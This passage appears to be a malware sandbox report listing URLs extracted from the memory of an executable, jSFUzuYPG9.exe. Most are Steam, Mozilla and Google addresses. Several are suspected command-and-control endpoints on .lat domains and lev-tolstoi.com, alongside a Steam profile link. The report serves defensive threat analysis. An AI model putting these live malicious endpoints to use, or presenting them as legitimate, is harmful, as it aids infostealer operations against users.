https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.71
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l==
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat:443/api=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api$
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/$
                Source: jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496634027.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;#
                Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/X236
                Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427112957.0000000005DF2000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api8
                Source: jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/cE
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/h
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/x
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s7
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.nP
                Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Per
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/api
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/d
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat:443/apis
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
